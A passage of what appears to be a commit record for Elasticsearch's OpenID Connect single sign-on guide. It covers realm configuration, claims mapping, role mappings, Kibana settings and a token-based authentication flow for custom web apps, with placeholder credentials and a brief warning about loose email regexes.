instance.\n\n[[oidc-without-kibana]]\n=== OpenID Connect without {kib}\n\nThe OpenID Connect realm is designed to allow users to authenticate to {kib} and, as\nsuch, most of the guide above assumes that {kib} is used.\nThis section describes how a custom web application could use the relevant OpenID\nConnect REST APIs in order to authenticate users to {es} with OpenID Connect.\n\nSingle sign-on realms such as OpenID Connect and SAML make use of the Token Service in\n{es} and in principle exchange a SAML or OpenID Connect Authentication response for\nan {es} access token and a refresh token. The access token is used as credentials for subsequent calls to {es}. The\nrefresh token enables the user to get new {es} access tokens after the current one\nexpires.\n\nNOTE: The {es} Token Service can be seen as a minimal OAuth2 authorization server\nand the access token and refresh token mentioned above are tokens that pertain\n_only_ to this authorization server. They are generated and consumed _only_ by {es}\nand are in no way related to the tokens (access token and ID Token) that the\nOpenID Connect Provider issues.
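
For example, once the current access token expires, a new one can be requested through the <<security-api-get-token,get token API>> with the `refresh_token` grant type. This is a sketch that reuses the placeholder refresh token from the logout example below:

[source,console]
--------------------------------------------------
POST \/_security\/oauth2\/token
{
  \"grant_type\" : \"refresh_token\",
  \"refresh_token\" : \"vLBPvmAB6KvwvJZr27cS\"
}
--------------------------------------------------
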
==== Register the RP with an OpenID Connect Provider\n\nThe Relying Party ({es} and the custom web app) will need to be registered as a\nclient with the OpenID Connect Provider. Note that when registering the\n`Redirect URI`, it needs to be a URL in the custom web app.\n\n==== OpenID Connect Realm\n\nAn OpenID Connect realm needs to be created and configured accordingly\nin {es}. See <<oidc-guide-authentication>>.\n\n==== Service Account user for accessing the APIs\n\nThe realm is designed with the assumption that there needs to be a privileged entity\nacting as an authentication proxy. In this case, the custom web application is the\nauthentication proxy handling the authentication of end users (more correctly,\n\"delegating\" the authentication to the OpenID Connect Provider). The OpenID Connect\nAPIs require authentication and the necessary authorization level for the authenticated\nuser. For this reason, a Service Account user needs to be created and assigned a role\nthat gives them the `manage_oidc` cluster privilege. The use of the `manage_token`\ncluster privilege will be necessary after the authentication takes place, so that\nthe user can maintain access or be subsequently logged out.\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/role\/facilitator-role\n{\n \"cluster\" : [\"manage_oidc\", \"manage_token\"]\n}\n--------------------------------------------------\n\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/user\/facilitator\n{\n \"password\" : \"<somePasswordHere>\",\n \"roles\" : [ \"facilitator-role\"]\n}\n--------------------------------------------------\n\n\n==== Handling the authentication flow\n\nAt a high level, the custom web application would need to perform the following steps in order to\nauthenticate a user with OpenID Connect:\n\n. Make an HTTP POST request to `_security\/oidc\/prepare`, authenticating as the `facilitator` user, using the name of the\nOpenID Connect realm in the {es} configuration in the request body. For more\ndetails, see\n<<security-api-oidc-prepare-authentication>>.\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/prepare\n{\n \"realm\" : \"oidc1\"\n}\n--------------------------------------------------\n+\n. Handle the response to `\/_security\/oidc\/prepare`. The response from {es} will contain 3 parameters:\n `redirect`, `state`, `nonce`. The custom web application would need to store the values for `state`\n and `nonce` in the user's session (client side in a cookie or server side if session information is\n persisted this way) and redirect the user's browser to the URL that will be contained in the\n `redirect` value.\n. Handle a subsequent response from the OP. After the user is successfully authenticated with the\n OpenID Connect Provider, they will be redirected back to the callback\/redirect URI. Upon receiving\n this HTTP GET request, the custom web app will need to make an HTTP POST request to\n `_security\/oidc\/authenticate`, again - authenticating as the `facilitator` user - passing the URL\n where the user's browser was redirected to, as a parameter, along with the\n values for `nonce` and `state` it had saved in the user's session previously. 
If more than one\n OpenID Connect realm is configured, the custom web app can specify the name of the realm to be\n used for handling this, but this parameter is optional. For more details, see\n <<security-api-oidc-authenticate>>.\n+\n[source,console]\n-----------------------------------------------------------------------\nPOST \/_security\/oidc\/authenticate\n{\n \"redirect_uri\" : \"https:\/\/oidc-kibana.elastic.co:5603\/api\/security\/oidc\/callback?code=jtI3Ntt8v3_XvcLzCFGq&state=4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"state\" : \"4dbrihtIAt3wBTwo6DxK-vdk-sSyDBV8Yf0AjdkdT5I\",\n \"nonce\" : \"WaBPH0KqPVdG5HHdSxPRjfoZbXMCicm5v1OiAj0DUFM\",\n \"realm\" : \"oidc1\"\n}\n-----------------------------------------------------------------------\n\/\/ TEST[catch:unauthorized]\n+\n{es} will validate this and, if all is correct, will respond with an access token that can be used\nas a `Bearer` token for subsequent requests and a refresh token that can later be used to refresh the given\naccess token as described in <<security-api-get-token>>.\n. At some point, if necessary, the custom web application can log the user out by using the\n<<security-api-oidc-logout,OIDC logout API>> passing the access token and refresh token as parameters. For example:\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/logout\n{\n \"token\" : \"dGhpcyBpcyBub3QgYSByZWFsIHRva2VuIGJ1dCBpdCBpcyBvbmx5IHRlc3QgZGF0YS4gZG8gbm90IHRyeSB0byByZWFkIHRva2VuIQ==\",\n \"refresh_token\": \"vLBPvmAB6KvwvJZr27cS\"\n}\n--------------------------------------------------\n\/\/ TEST[catch:request]\n+\nIf the realm is configured accordingly, this may result in a response with a `redirect` parameter indicating where\nthe user needs to be redirected in the OP in order to complete the logout process.\n","old_contents":"[role=\"xpack\"]\n[[oidc-guide]]\n\n== Configuring single sign-on to the {stack} using OpenID Connect\n\nThe Elastic Stack supports single sign-on (SSO) using OpenID Connect via {kib} using\n{es} as the backend service that holds most of the functionality. {kib} and {es}\ntogether represent an OpenID Connect Relying Party (RP) that supports the authorization code flow and implicit flow as these are defined in the OpenID Connect specification.\n\nThis guide assumes that you have an OpenID Connect Provider where the\nElastic Stack Relying Party will be registered.\n\nNOTE: The OpenID Connect realm support in {kib} is designed with the expectation that it\nwill be the primary authentication method for the users of that {kib} instance. The\n<<oidc-kibana>> section describes what this entails and how you can set it up to support\nother realms if necessary.\n\n[[oidc-guide-op]]\n=== The OpenID Connect Provider\n\nThe OpenID Connect Provider (OP) is the entity in OpenID Connect that is responsible for\nauthenticating the user and for granting the necessary tokens with the authentication and\nuser information to be consumed by the Relying Parties.\n\nIn order for the Elastic Stack to be able use your OpenID Connect Provider for authentication,\na trust relationship needs to be established between the OP and the RP. In the OpenID Connect\nProvider, this means registering the RP as a client. OpenID Connect defines a dynamic client\nregistration protocol but this is usually geared towards real-time client registration and\nnot the trust establishment process for cross security domain single sign on. 
All OPs will\nalso allow for the manual registration of an RP as a client, via a user interface or (less often)\nvia the consumption of a metadata document.\n\nThe process for registering the Elastic Stack RP will be different from OP to OP and following\nthe provider's relevant documentation is prudent. The information for the\nRP that you commonly need to provide for registration are the following:\n\n- `Relying Party Name`: An arbitrary identifier for the relying party. Neither the specification\nnor the Elastic Stack implementation impose any constraints on this value.\n- `Redirect URI`: This is the URI where the OP will redirect the user's browser after authentication. The\nappropriate value for this will depend on your setup and whether or not {kib} sits behind a proxy or\nload balancer. It will typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ (for the authorization code flow) or +$\\{kibana-url}\/api\/security\/oidc\/implicit+ (for the implicit flow) where _$\\{kibana-url}_ is the base URL for your {kib} instance. You might also see this\ncalled `Callback URI`.\n\nAt the end of the registration process, the OP will assign a Client Identifier and a Client Secret for the RP ({stack}) to use.\nNote these two values as they will be used in the {es} configuration.\n\n[[oidc-guide-authentication]]\n=== Configure {es} for OpenID Connect authentication\n\nThe following is a summary of the configuration steps required in order to enable authentication\nusing OpenID Connect in {es}:\n\n. <<oidc-enable-http,Enable SSL\/TLS for HTTP>>\n. <<oidc-enable-token,Enable the Token Service>>\n. <<oidc-create-realm,Create one or more OpenID Connect realms>>\n. <<oidc-role-mapping,Configure role mappings>>\n\n[[oidc-enable-http]]\n==== Enable TLS for HTTP\n\nIf your {es} cluster is operating in production mode, then you must\nconfigure the HTTP interface to use SSL\/TLS before you can enable OpenID Connect\nauthentication.\n\nFor more information, see\n<<tls-http>>.\n\n[[oidc-enable-token]]\n==== Enable the token service\n\nThe {es} OpenID Connect implementation makes use of the {es} Token Service. This service\nis automatically enabled if you configure TLS on the HTTP interface, and can be\nexplicitly configured by including the following in your `elasticsearch.yml` file:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.token.enabled: true\n------------------------------------------------------------\n\n[[oidc-create-realm]]\n==== Create an OpenID Connect realm\n\nOpenID Connect based authentication is enabled by configuring the appropriate realm within\nthe authentication chain for {es}.\n\nThis realm has a few mandatory settings, and a number of optional settings.\nThe available settings are described in detail in\n<<ref-oidc-settings>>. This\nguide will explore the most common settings.\n\nCreate an OpenID Connect (the realm type is `oidc`) realm in your `elasticsearch.yml` file\nsimilar to what is shown below:\n\nNOTE: The values used below are meant to be an example and are not intended to apply to\nevery use case. 
The details below the configuration snippet provide insights and suggestions\nto help you pick the proper values, depending on your OP configuration.\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.issuer: \"https:\/\/op.example.org\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.jwkset_path: oidc\/jwkset.json\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n rp.post_logout_redirect_uri: \"https:\/\/kibana.example.org:5601\/logged_out\"\n claims.principal: sub\n claims.groups: \"http:\/\/example.info\/claims\/groups\"\n-------------------------------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\nxpack.security.authc.realms.oidc.oidc1::\n This defines a new `oidc` authentication realm named \"oidc1\".\n See <<realms>> for more explanation of realms.\n\norder::\n You should define a unique order on each realm in your authentication chain.\n It is recommended that the OpenID Connect realm be at the bottom of your authentication\n chain (that is, that it has the _highest_ order).\n\nrp.client_id::\n This, usually opaque, arbitrary string, is the Client Identifier that was assigned to the Elastic Stack RP by the OP upon\n registration.\n\nrp.response_type::\n This is an identifier that controls which OpenID Connect authentication flow this RP supports and also\n which flow this RP requests the OP should follow. Supported values are\n - `code`, which means that the RP wants to use the Authorization Code flow. If your OP supports the\n Authorization Code flow, you should select this instead of the Implicit Flow.\n - `id_token token` which means that the RP wants to use the Implicit flow and we also request an oAuth2\n access token from the OP, that we can potentially use for follow up requests ( UserInfo ). This\n should be selected if the OP offers a UserInfo endpoint in its configuration, or if you know that\n the claims you will need to use for role mapping are not available in the ID Token.\n - `id_token` which means that the RP wants to use the Implicit flow, but is not interested in getting\n an oAuth2 token too. Select this if you are certain that all necessary claims will be contained in\n the ID Token or if the OP doesn't offer a User Info endpoint.\n\nrp.redirect_uri::\n The redirect URI where the OP will redirect the browser after authentication. This needs to be\n _exactly_ the same as the one <<oidc-guide-op, configured with the OP upon registration>> and will\n typically be +$\\{kibana-url}\/api\/security\/oidc\/callback+ where _$\\{kibana-url}_ is the base URL for your {kib} instance\n\nop.issuer::\n A verifiable Identifier for your OpenID Connect Provider. An Issuer Identifier is usually a case sensitive URL.\n The value for this setting should be provided by your OpenID Connect Provider.\n\nop.authorization_endpoint::\n The URL for the Authorization Endpoint in the OP. This is where the user's browser\n will be redirected to start the authentication process. 
The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.token_endpoint::\n The URL for the Token Endpoint in the OpenID Connect Provider. This is the endpoint where\n {es} will send a request to exchange the code for an ID Token. This setting is optional when\n you use the implicit flow. The value for this setting should be provided by your OpenID Connect Provider.\n\nop.jwkset_path::\n The path to a file or a URL containing a JSON Web Key Set with the key material that the OpenID Connect\n Provider uses for signing tokens and claims responses. If a path is set, it is resolved relative to the {es}\n config directory.\n {es} will automatically monitor this file for changes and will reload the configuration whenever\n it is updated. Your OpenID Connect Provider should provide you with this file or a URL where it is available.\n\nop.userinfo_endpoint::\n (Optional) The URL for the UserInfo Endpoint in the OpenID Connect Provider. This is the endpoint of the OP that\n can be queried to get further user information, if required. The value for this setting should be provided by your\n OpenID Connect Provider.\n\nop.endsession_endpoint::\n (Optional) The URL to the End Session Endpoint in the OpenID Connect Provider. This is the endpoint where the user's\n browser will be redirected after local logout, if the realm is configured for RP initiated Single Logout and\n the OP supports it. The value for this setting should be provided by your OpenID Connect Provider.\n\nrp.post_logout_redirect_uri::\n (Optional) The Redirect URL where the OpenID Connect Provider should redirect the user after a\n successful Single Logout (assuming `op.endsession_endpoint` above is also set). This should be set to a value that\n will not trigger a new OpenID Connect Authentication, such as +$\\{kibana-url}\/logged_out+ where _$\\{kibana-url}_ is\n the base URL for your {kib} instance.\n\nclaims.principal:: See <<oidc-claims-mapping>>.\nclaims.groups:: See <<oidc-claims-mapping>>.\n\nA final piece of configuration of the OpenID Connect realm is to set the `Client Secret` that was assigned\nto the RP during registration in the OP. This is a secure setting and as such is not defined in the realm\nconfiguration in `elasticsearch.yml` but added to the\n<<secure-settings,elasticsearch keystore>>.\nFor instance\n\n\n[source,sh]\n----\nbin\/elasticsearch-keystore add xpack.security.authc.realms.oidc.oidc1.rp.client_secret\n----\n\n\nNOTE: According to the OpenID Connect specification, the OP should also make their configuration\navailable at a well known URL, which is the concatenation of their `Issuer` value with the\n`.well-known\/openid-configuration` string. For example: `https:\/\/op.org.com\/.well-known\/openid-configuration`\nThat document should contain all the necessary information to configure the OpenID Connect realm in {es}.\n\n\n[[oidc-claims-mapping]]\n==== Claims mapping\n\n===== Claims and scopes\n\nWhen authenticating to {kib} using OpenID Connect, the OP will provide information about the user\nin the form of OpenID Connect Claims, that can be included either in the ID Token, or be retrieved from the\nUserInfo endpoint of the OP. The claim is defined as a piece of information asserted by the OP\nfor the authenticated user. Simply put, a claim is a name\/value pair that contains information about\nthe user. Related to claims, we also have the notion of OpenID Connect Scopes. Scopes are identifiers\nthat are used to request access to specific lists of claims. 
The standard defines a set of scope\nidentifiers that can be requested. The only mandatory one is `openid`, while commonly used ones are\n`profile` and `email`. The `profile` scope requests access to the `name`,`family_name`,`given_name`,`middle_name`,`nickname`,\n`preferred_username`,`profile`,`picture`,`website`,`gender`,`birthdate`,`zoneinfo`,`locale`, and `updated_at` claims.\nThe `email` scope requests access to the `email` and `email_verified` claims. The process is that\nthe RP requests specific scopes during the authentication request. If the OP Privacy Policy\nallows it and the authenticating user consents to it, the related claims are returned to the\nRP (either in the ID Token or as a UserInfo response).\n\nThe list of the supported claims will vary depending on the OP you are using, but you can expect\nthe https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[Standard Claims] to be\nlargely supported.\n\n[[oidc-claim-to-property]]\n===== Mapping claims to user properties\n\nThe goal of claims mapping is to configure {es} in such a way as to be able to map the values of\nspecified returned claims to one of the <<oidc-user-properties, user properties>> that are supported\nby {es}. These user properties are then utilized to identify the user in the {kib} UI or the audit\nlogs, and can also be used to create <<oidc-role-mapping, role mapping>> rules.\n\nThe recommended steps for configuring OpenID Claims mapping are as follows:\n\n. Consult your OP configuration to see what claims it might support. Note that\n the list provided in the OP's metadata or in the configuration page of the OP\n is a list of potentially supported claims. However, for privacy reasons it might\n not be a complete one, or not all supported claims will be available for all\n authenticated users.\n\n. Read through the list of <<oidc-user-properties, user properties>> that {es}\n supports, and decide which of them are useful to you, and can be provided by\n your OP in the form of claims. At a _minimum_, the `principal` user property\n is required.\n\n. Configure your OP to \"release\" those claims to your {stack} Relying\n party. This process greatly varies by provider. You can use a static\n configuration while others will support that the RP requests the scopes that\n correspond to the claims to be \"released\" on authentication time. See\n <<ref-oidc-settings,`rp.requested_scopes`>> for details about how\n to configure the scopes to request. To ensure interoperability and minimize\n the errors, you should only request scopes that the OP supports, and which you\n intend to map to {es} user properties.\n\n NOTE: You can only map claims with values that are strings, numbers, boolean values or an array\n of the aforementioned.\n\n. Configure the OpenID Connect realm in {es} to associate the {es} user properties (see\n <<oidc-user-properties, the listing>> below), to the name of the claims that your\n OP will release. In the example above, we have configured the `principal` and\n `groups` user properties as follows:\n\n .. `claims.principal: sub` : This instructs {es} to look for the OpenID Connect claim named `sub`\n in the ID Token that the OP issued for the user ( or in the UserInfo response ) and assign the\n value of this claim to the `principal` user property. `sub` is a commonly used claim for the\n principal property as it is an identifier of the user in the OP and it is also a required\n claim of the ID Token, thus offering guarantees that it will be available. 
It is, however,\n only used as an example here, the OP may provide another claim that is a better fit for your needs.\n\n .. `claims.groups: \"http:\/\/example.info\/claims\/groups\"` : Similarly, this instructs {es} to look\n for the claim with the name `http:\/\/example.info\/claims\/groups` (note that this is a URI - an\n identifier, treated as a string and not a URL pointing to a location that will be retrieved)\n either in the ID Token or in the UserInfo response, and map the value(s) of it to the user\n property `groups` in {es}. There is no standard claim in the specification that is used for\n expressing roles or group memberships of the authenticated user in the OP, so the name of the\n claim that should be mapped here, will vary greatly between providers. Consult your OP\n documentation for more details.\n\n[[oidc-user-properties]]\n===== {es} user properties\n\nThe {es} OpenID Connect realm can be configured to map OpenID Connect claims to the\nfollowing properties on the authenticated user:\n\nprincipal:: _(Required)_\n This is the _username_ that will be applied to a user that authenticates\n against this realm.\n The `principal` appears in places such as the {es} audit logs.\n\nNOTE: If the principal property fails to be mapped from a claim, the authentication fails.\n\ngroups:: _(Recommended)_\n If you wish to use your OP's concept of groups or roles as the basis for a\n user's {es} privileges, you should map them with this property.\n The `groups` are passed directly to your <<oidc-role-mapping, role mapping rules>>.\n\nname:: _(Optional)_ The user's full name.\nmail:: _(Optional)_ The user's email address.\ndn:: _(Optional)_ The user's X.500 _Distinguished Name_.\n\n\n===== Extracting partial values from OpenID Connect claims\n\nThere are some occasions where the value of a claim may contain more information\nthan you wish to use within {es}. A common example of this is one where the\nOP works exclusively with email addresses, but you would like the user's\n`principal` to use the _local-name_ part of the email address.\nFor example if their email address was `james.wong@staff.example.com`, then you\nwould like their principal to simply be `james.wong`.\n\nThis can be achieved using the `claim_patterns` setting in the {es}\nrealm, as demonstrated in the realm configuration below:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 2\n rp.client_id: \"the_client_id\"\n rp.response_type: code\n rp.redirect_uri: \"https:\/\/kibana.example.org:5601\/api\/security\/oidc\/callback\"\n op.authorization_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/authorize\"\n op.token_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/token\"\n op.userinfo_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/userinfo\"\n op.endsession_endpoint: \"https:\/\/op.example.org\/oauth2\/v1\/logout\"\n op.issuer: \"https:\/\/op.example.org\"\n op.jwkset_path: oidc\/jwkset.json\n claims.principal: email_verified\n claim_patterns.principal: \"^([^@]+)@staff\\\\.example\\\\.com$\"\n-------------------------------------------------------------------------------------\n\nIn this case, the user's `principal` is mapped from the `email_verified` claim, but a\nregular expression is applied to the value before it is assigned to the user.\nIf the regular expression matches, then the result of the first group is used as the\neffective value. 
If the regular expression does not match then the claim\nmapping fails.\n\nIn this example, the email address must belong to the `staff.example.com` domain,\nand then the local-part (anything before the `@`) is used as the principal.\nAny users who try to login using a different email domain will fail because the\nregular expression will not match against their email address, and thus their\nprincipal user property - which is mandatory - will not be populated.\n\nIMPORTANT: Small mistakes in these regular expressions can have significant\nsecurity consequences. For example, if we accidentally left off the trailing\n`$` from the example above, then we would match any email address where the\ndomain starts with `staff.example.com`, and this would accept an email\naddress such as `admin@staff.example.com.attacker.net`. It is important that\nyou make sure your regular expressions are as precise as possible so that\nyou do not inadvertently open an avenue for user impersonation attacks.\n\n[[third-party-login]]\n==== Third party initiated single sign-on\n\nThe Open ID Connect realm in {es} supports 3rd party initiated login as described in the\nhttps:\/\/openid.net\/specs\/openid-connect-core-1_0.html#ThirdPartyInitiatedLogin[relevant specification].\n\nThis allows the OP itself or another, third party other than the RP, to initiate the authentication\nprocess while requesting the OP to be used for the authentication. Please note that the Elastic\nStack RP should already be configured for this OP, in order for this process to succeed.\n\n\n[[oidc-logout]]\n==== OpenID Connect Logout\n\nThe OpenID Connect realm in {es} supports RP-Initiated Logout Functionality as\ndescribed in the\nhttps:\/\/openid.net\/specs\/openid-connect-session-1_0.html#RPLogout[relevant part of the specification]\n\nIn this process, the OpenID Connect RP (the Elastic Stack in this case) will redirect the user's\nbrowser to predefined URL of the OP after successfully completing a local logout. The OP can then\nlogout the user also, depending on the configuration, and should finally redirect the user back to the\nRP. The `op.endsession_endpoint` in the realm configuration determines the URL in the OP that the browser\nwill be redirected to. The `rp.post_logout_redirect_uri` setting determines the URL to redirect\nthe user back to after the OP logs them out.\n\nWhen configuring `rp.post_logout_redirect_uri`, care should be taken to not point this to a URL that\nwill trigger re-authentication of the user. For instance, when using OpenID Connect to support\nsingle sign-on to {kib}, this could be set to +$\\{kibana-url}\/logged_out+, which will show a user-\nfriendly message to the user.\n\n[[oidc-ssl-config]]\n==== OpenID Connect Realm SSL Configuration\n\nOpenID Connect depends on TLS to provide security properties such as encryption in transit and endpoint authentication. The RP\nis required to establish back-channel communication with the OP in order to exchange the code for an ID Token during the\nAuthorization code grant flow and in order to get additional user information from the UserInfo endpoint. Furthermore, if\nyou configure `op.jwks_path` as a URL, {es} will need to get the OP's signing keys from the file hosted there. As such, it is\nimportant that {es} can validate and trust the server certificate that the OP uses for TLS. 
Since the system truststore is\nused for the client context of outgoing https connections, if your OP is using a certificate from a trusted CA, no additional\nconfiguration is needed.\n\nHowever, if the issuer of your OP's certificate is not trusted by the JVM on which {es} is running (e.g it uses a organization CA), then you must configure\n{es} to trust that CA. Assuming that you have the CA certificate that has signed the certificate that the OP uses for TLS\nstored in the \/oidc\/company-ca.pem` file stored in the configuration directory of {es}, you need to set the following\nproperty in the realm configuration:\n\n[source, yaml]\n-------------------------------------------------------------------------------------\nxpack.security.authc.realms.oidc.oidc1:\n order: 1\n ...\n ssl.certificate_authorities: [\"\/oidc\/company-ca.pem\"]\n-------------------------------------------------------------------------------------\n\n[[oidc-role-mapping]]\n=== Configuring role mappings\n\nWhen a user authenticates using OpenID Connect, they are identified to the Elastic Stack,\nbut this does not automatically grant them access to perform any actions or\naccess any data.\n\nYour OpenID Connect users cannot do anything until they are assigned roles. This can be done\nthrough either the\n<<security-api-put-role-mapping,add role mapping API>> or with\n<<authorization_realms,authorization realms>>.\n\nNOTE: You cannot use <<mapping-roles-file,role mapping files>>\nto grant roles to users authenticating via OpenID Connect.\n\nThis is an example of a simple role mapping that grants the `example_role` role\nto any user who authenticates against the `oidc1` OpenID Connect realm:\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-example\n{\n \"roles\": [ \"example_role\" ], <1>\n \"enabled\": true,\n \"rules\": {\n \"field\": { \"realm.name\": \"oidc1\" }\n }\n}\n--------------------------------------------------\n\n<1> The `example_role` role is *not* a builtin Elasticsearch role.\nThis example assumes that you have created a custom role of your own, with\nappropriate access to your <<roles-indices-priv,data streams, indices,>> and\n{kibana-ref}\/kibana-privileges.html#kibana-feature-privileges[Kibana features].\n\nThe user properties that are mapped via the realm configuration are used to process\nrole mapping rules, and these rules determine which roles a user is granted.\n\nThe user fields that are provided to the role\nmapping are derived from the OpenID Connect claims as follows:\n\n- `username`: The `principal` user property\n- `dn`: The `dn` user property\n- `groups`: The `groups` user property\n- `metadata`: See <<oidc-user-metadata>>\n\nFor more information, see <<mapping-roles>> and\n<<security-role-mapping-apis>>.\n\nIf your OP has the ability to provide groups or roles to RPs via tha use of\nan OpenID Claim, then you should map this claim to the `claims.groups` setting in\nthe {es} realm (see <<oidc-claim-to-property>>), and then make use of it in a role mapping\nas per the example below.\n\nThis mapping grants the {es} `finance_data` role, to any users who authenticate\nvia the `oidc1` realm with the `finance-team` group membership.\n\n[source,console]\n--------------------------------------------------\nPUT \/_security\/role_mapping\/oidc-finance\n{\n \"roles\": [ \"finance_data\" ],\n \"enabled\": true,\n \"rules\": { \"all\": [\n { \"field\": { \"realm.name\": \"oidc1\" } },\n { \"field\": { \"groups\": \"finance-team\" } }\n ] 
}\n}\n--------------------------------------------------\n\nIf your users also exist in a repository that can be directly accessed by {es}\n(such as an LDAP directory) then you can use\n<<authorization_realms, authorization realms>> instead of role mappings.\n\nIn this case, you perform the following steps:\n1. In your OpenID Connect realm, assign a claim to act as the lookup userid,\n by configuring the `claims.principal` setting.\n2. Create a new realm that can lookup users from your local repository (e.g. an\n `ldap` realm)\n3. In your OpenID Connect realm, set `authorization_realms` to the name of the realm you\n created in step 2.\n\n[[oidc-user-metadata]]\n=== User metadata\n\nBy default users who authenticate via OpenID Connect will have some additional metadata\nfields. These fields will include every OpenID Claim that is provided in the authentication response\n(regardless of whether it is mapped to an {es} user property). For example,\nin the metadata field `oidc(claim_name)`, \"claim_name\" is the name of the\nclaim as it was contained in the ID Token or in the User Info response. Note that these will\ninclude all the https:\/\/openid.net\/specs\/openid-connect-core-1_0.html#IDToken[ID Token claims]\nthat pertain to the authentication event, rather than the user themselves.\n\nThis behaviour can be disabled by adding `populate_user_metadata: false` as\na setting in the oidc realm.\n\n[[oidc-kibana]]\n=== Configuring {kib}\n\nOpenID Connect authentication in {kib} requires a small number of additional settings\nin addition to the standard {kib} security configuration. The\n{kibana-ref}\/using-kibana-with-security.html[{kib} security documentation]\nprovides details on the available configuration options that you can apply.\n\nIn particular, since your {es} nodes have been configured to use TLS on the HTTP\ninterface, you must configure {kib} to use a `https` URL to connect to {es}, and\nyou may need to configure `elasticsearch.ssl.certificateAuthorities` to trust\nthe certificates that {es} has been configured to use.\n\nOpenID Connect authentication in {kib} is also subject to the\n`xpack.security.sessionTimeout` setting that is described in the {kib} security\ndocumentation, and you may wish to adjust this timeout to meet your local needs.\n\nThe three additional settings that are required for OpenID Connect support are shown below:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n------------------------------------------------------------\n\nThe configuration values used in the example above are:\n\n`xpack.security.authc.providers`::\nAdd `oidc` provider to instruct {kib} to use OpenID Connect single sign-on as the\nauthentication method. This instructs Kibana to attempt to initiate an SSO flow\neverytime a user attempts to access a URL in Kibana, if the user is not already\nauthenticated. If you also want to allow users to login with a username and password,\nyou must enable the `basic` authentication provider too. 
For example:\n\n[source, yaml]\n------------------------------------------------------------\nxpack.security.authc.providers:\n oidc.oidc1:\n order: 0\n realm: \"oidc1\"\n basic.basic1:\n order: 1\n------------------------------------------------------------\n\nThis will allow users that haven't already authenticated with OpenID Connect to\nlog in using the {kib} login form.\n\n`xpack.security.authc.providers.oidc.<provider-name>.realm`::\nThe name of the OpenID Connect realm in {es} that should handle authentication\nfor this Kibana instance.\n\n[[oidc-without-kibana]]\n=== OpenID Connect without {kib}\n\nThe OpenID Connect realm is designed to allow users to authenticate to {kib} and as\nsuch, most of the parts of the guide above make the assumption that {kib} is used.\nThis section describes how a custom web application could use the relevant OpenID\nConnect REST APIs in order to authenticate the users to {es}, with OpenID Connect.\n\nSingle sign-on realms such as OpenID Connect and SAML make use of the Token Service in\n{es} and in principle exchange a SAML or OpenID Connect Authentication response for\nan {es} access token and a refresh token. The access token is used as credentials for subsequent calls to {es}. The\nrefresh token enables the user to get new {es} access tokens after the current one\nexpires.\n\nNOTE: The {es} Token Service can be seen as a minimal oAuth2 authorization server\nand the access token and refresh token mentioned above are tokens that pertain\n_only_ to this authorization server. They are generated and consumed _only_ by {es}\nand are in no way related to the tokens ( access token and ID Token ) that the\nOpenID Connect Provider issues.\n\n==== Register the RP with an OpenID Connect Provider\n\nThe Relying Party ( {es} and the custom web app ) will need to be registered as\nclient with the OpenID Connect Provider. Note that when registering the\n`Redirect URI`, it needs to be a URL in the custom web app.\n\n==== OpenID Connect Realm\n\nAn OpenID Connect realm needs to be created and configured accordingly\nin {es}. See <<oidc-guide-authentication>>\n\n==== Service Account user for accessing the APIs\n\nThe realm is designed with the assumption that there needs to be a privileged entity\nacting as an authentication proxy. In this case, the custom web application is the\nauthentication proxy handling the authentication of end users ( more correctly,\n\"delegating\" the authentication to the OpenID Connect Provider ). The OpenID Connect\nAPIs require authentication and the necessary authorization level for the authenticated\nuser. For this reason, a Service Account user needs to be created and assigned a role\nthat gives them the `manage_oidc` cluster privilege. 
The use of the `manage_token`\ncluster privilege will be necessary after the authentication takes place, so that the\nthe user can maintain access or be subsequently logged out.\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/role\/facilitator-role\n{\n \"cluster\" : [\"manage_oidc\", \"manage_token\"]\n}\n--------------------------------------------------\n\n\n[source,console]\n--------------------------------------------------\nPOST \/_security\/user\/facilitator\n{\n \"password\" : \"<somePasswordHere>\",\n \"roles\" : [ \"facilitator-role\"]\n}\n--------------------------------------------------\n\n\n==== Handling the authentication flow\n\nOn a high level, the custom web application would need to perform the following steps in order to\nauthenticate a user with OpenID Connect:\n\n. Make an HTTP POST request to `_security\/oidc\/prepare`, authenticating as the `facilitator` user, using the name of the\nOpenID Connect realm in the {es} configuration in the request body. For more\ndetails, see\n<<security-api-oidc-prepare-authentication>>.\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/prepare\n{\n \"realm\" : \"oidc1\"\n}\n--------------------------------------------------\n+\n. Handle the response to `\/_security\/oidc\/prepare`. The response from {es} will contain 3 parameters:\n `redirect`, `state`, `nonce`. The custom web application would need to store the values for `state`\n and `nonce` in the user's session (client side in a cookie or server side if session information is\n persisted this way) and redirect the user's browser to the URL that will be contained in the\n `redirect` value.\n. Handle a subsequent response from the OP. After the user is successfully authenticated with the\n OpenID Connect Provider, they will be redirected back to the callback\/redirect URI. Upon receiving\n this HTTP GET request, the custom web app will need to make an HTTP POST request to\n `_security\/oidc\/authenticate`, again - 